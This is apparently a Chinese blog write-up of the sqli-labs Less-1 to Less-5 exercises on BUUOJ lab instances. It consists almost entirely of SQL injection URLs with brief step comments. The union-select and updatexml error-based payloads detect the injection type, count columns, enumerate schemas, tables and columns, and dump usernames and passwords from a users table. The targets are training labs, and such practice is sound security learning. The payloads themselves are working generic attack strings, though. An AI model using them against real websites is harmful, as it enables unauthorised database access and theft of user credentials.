less1
#判断出为字符型注入
http://7a32dad4-e2fd-4bfd-adf1-29afc1328b1f.node4.buuoj.cn/Less-1/?id=1 and 1=1--+
http://7a32dad4-e2fd-4bfd-adf1-29afc1328b1f.node4.buuoj.cn/Less-1/?id=1 and 1=2--+
http://7a32dad4-e2fd-4bfd-adf1-29afc1328b1f.node4.buuoj.cn/Less-1/?id=1' and 1=1--+
http://7a32dad4-e2fd-4bfd-adf1-29afc1328b1f.node4.buuoj.cn/Less-1/?id=1' and 1=2--+
#3个字段
http://7a32dad4-e2fd-4bfd-adf1-29afc1328b1f.node4.buuoj.cn/Less-1/?id=1' order by 3 --+
http://7a32dad4-e2fd-4bfd-adf1-29afc1328b1f.node4.buuoj.cn/Less-1/?id=1' order by 4 --+
#2,3回显
http://7a32dad4-e2fd-4bfd-adf1-29afc1328b1f.node4.buuoj.cn/Less-1/?id=0' union select 1,2,3 --+
#爆库名
http://7a32dad4-e2fd-4bfd-adf1-29afc1328b1f.node4.buuoj.cn/Less-1/?id=0' union select 1,database(),group_concat(schema_name) from information_schema.schemata --+
#爆表名
http://7a32dad4-e2fd-4bfd-adf1-29afc1328b1f.node4.buuoj.cn/Less-1/?id=0' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database() --+
#爆字段名
http://7a32dad4-e2fd-4bfd-adf1-29afc1328b1f.node4.buuoj.cn/Less-1/?id=0' union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'--+
#爆用户密码
http://7a32dad4-e2fd-4bfd-adf1-29afc1328b1f.node4.buuoj.cn/Less-1/?id=0' union select 1,group_concat(username),group_concat(password) from users --+
less2
#判断为数字型注入
http://7a32dad4-e2fd-4bfd-adf1-29afc1328b1f.node4.buuoj.cn/Less-2/?id=1 and 1=1 --+
http://7a32dad4-e2fd-4bfd-adf1-29afc1328b1f.node4.buuoj.cn/Less-2/?id=1 and 1=2 --+
#判断字段数
http://7a32dad4-e2fd-4bfd-adf1-29afc1328b1f.node4.buuoj.cn/Less-2/?id=1 order by 3 --+
http://7a32dad4-e2fd-4bfd-adf1-29afc1328b1f.node4.buuoj.cn/Less-2/?id=1 order by 4 --+
#判断回显
http://7a32dad4-e2fd-4bfd-adf1-29afc1328b1f.node4.buuoj.cn/Less-2/?id=0 union select 1,2,3 --+
#爆库名
http://7a32dad4-e2fd-4bfd-adf1-29afc1328b1f.node4.buuoj.cn/Less-2/?id=0 union select 1,database(),group_concat(schema_name) from information_schema.schemata --+
#爆表名
http://7a32dad4-e2fd-4bfd-adf1-29afc1328b1f.node4.buuoj.cn/Less-2/?id=0 union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database() --+
#爆字段名
http://7a32dad4-e2fd-4bfd-adf1-29afc1328b1f.node4.buuoj.cn/Less-2/?id=0 union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' --+
#爆用户密码
http://7a32dad4-e2fd-4bfd-adf1-29afc1328b1f.node4.buuoj.cn/Less-2/?id=0 union select 1,group_concat(username),group_concat(password) from users --+
less3
#判断需闭合的符号为')
http://7a32dad4-e2fd-4bfd-adf1-29afc1328b1f.node4.buuoj.cn/Less-3/?id=1'
其它和less1一样
less4
#得到闭合符号为")
http://7a32dad4-e2fd-4bfd-adf1-29afc1328b1f.node4.buuoj.cn/Less-4/?id=1"
#其它和less1一样
less5
#报错注入(最大显示32位,可用limit来限制)
#爆库名
http://c8a4ecbe-6321-4815-9c48-27ddf65a8287.node4.buuoj.cn/Less-5/?id=1' and updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),1) --+
#爆表名
http://c8a4ecbe-6321-4815-9c48-27ddf65a8287.node4.buuoj.cn/Less-5/?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) --+
#爆字段名
http://c8a4ecbe-6321-4815-9c48-27ddf65a8287.node4.buuoj.cn/Less-5/?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e),1) --+
#爆用户名/密码 这里的username可以换成password,但有最大显示32位的限制,可用limit,更改7,1的7即可
http://9bc0dfde-0f20-40ad-9491-7a59da4bc9fa.node4.buuoj.cn/Less-5/?id=1' and updatexml(1,concat(0x7e,(select username from users limit 7,1),0x7e),1) --+
标签:http,cn,Less,buuoj,less1,labs,sqli,node4,id
From: https://www.cnblogs.com/Error1s/p/16936400.html